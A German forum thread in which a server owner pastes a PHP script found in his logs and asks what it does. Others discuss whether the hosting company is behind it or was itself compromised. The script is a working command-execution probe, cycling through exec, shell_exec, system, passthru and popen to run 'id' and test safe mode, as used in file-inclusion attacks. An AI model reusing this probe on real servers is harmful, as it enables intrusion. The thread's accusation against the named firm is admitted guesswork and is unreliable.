Script?

michael-08

michael-08

New Member
Code: 
<html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
?>

Ich hab das heute bei meinem logwatch bericht gefunden! Kann mir einer sagen, was genau das macht?

Und das ganze liegt auf der Domain:

hxxp:// mega byte . hr
 
Aha, also will mich jemand mit einem gekauften Script scannen und schauen ob Lücken da sind!

Zumindest steht ganz groß die Domain auf der das Script tatsächlich liegt!

hxxp:// mega byte . hr// images / test.txt?

ohne die Leerzeichen! Wie sicher ist das? Kann man das nun anzeigen? Scheint eine Scheinfirma zu sein und ist irgendwie ISP! Kunde möcht ich da keiner sein!
 
Es muss ja nicht unbedingt der Besitzer der Domain hinter der ganzen Sache stecken. Wenn ich so etwas vor hätte würde ich mir einen Server "besorgen". Und wenn ich mir hier so die ganzen Posts von Leuten anschaue, die sich einen Server mieten um damit Linux zu lernen oder die einfach nur zocken wollen und keine Zeit für die Administration haben, denke ich dass es kein großes Problem sein sollte in kurzer Zeit ein brauchbares Objekt zu finden...
 
Die Domain da oben und der Inhalt sind aber keine Hobbyseiten oder Hobby Server Halter mit installiertem CS:S sondern das ist ein Unternehmen!

"Herzlich Willkommen! Um die Website des Unternehmens Megabyte d.o.o."
"über neue Produkte und Dienstleistungen in der..."
"Häufig gestellte Fragen"

Sind alles Ausschnitte aus den Websiten!

Produkte usw. haben die auch, allerdings nur per Anfrage!

Klar ist alles möglich, aber ich denke, dass der Seitenbetreiber dahinter steckt! Ist eben reine Mutmaßung!

Eventuell noch ein paar Kunden und alles geht wieder ins Nirvana, keiner weiß was, keiner kann alles immer und zugleich korrekt nachvollziehen und schon ists perfekt! Ich wette dieser Laden ist so einer! Für Spam oder was auch immer man die Verbindung fremder Rechner braucht!


Teilweise hat man Spammails im Postfach nach denen man mal googlen sollte! Es gibt viele Absender die mit Dingen werben, die aber im Netz schon bekannt sind und vor denen gewarnt wird, dass dort Abzocke läuft! Teilweise sitzen die in GB oder sonstwo und wirken seriös, da sie Markennamen bekannter Hersteller benutzen wie Dunhill Tobacco usw.! Aber ist am Ende dennoch nur Mutmaßung das oben genanntes Unternehmen die Rechnerqualität gehackter Systeme benötigt!
 
Last edited by a moderator:
michael-08 said:
Klar ist alles möglich, aber ich denke, dass der Seitenbetreiber dahinter steckt!
Click to expand...
Es wäre selten dämlich, dieses Skriptfragment auf der offiziellen Seite des Unternehmens zu hosten. Viel einfacher ist die Erklärung, dass das Unternehmen selbst Opfer einer Kompromittierung seiner Systeme ist. Bei der alten Version von Mambo, die für die Seite verwendet wird, ist das restliche System sicherlich nicht in besserem Zustand.

michael-08 said:
Teilweise hat man Spammails im Postfach nach denen man mal googlen sollte!
Click to expand...
Klar, wenn man sonst nichts zu tun hat... :rolleyes:
 
Dann wär es doch nur fair, wenn man das meldet! Dem ISP oder sonst wem! Kann allerdings diese Fremdsprache nicht!
 
You must log in or register to reply here.
Back
Top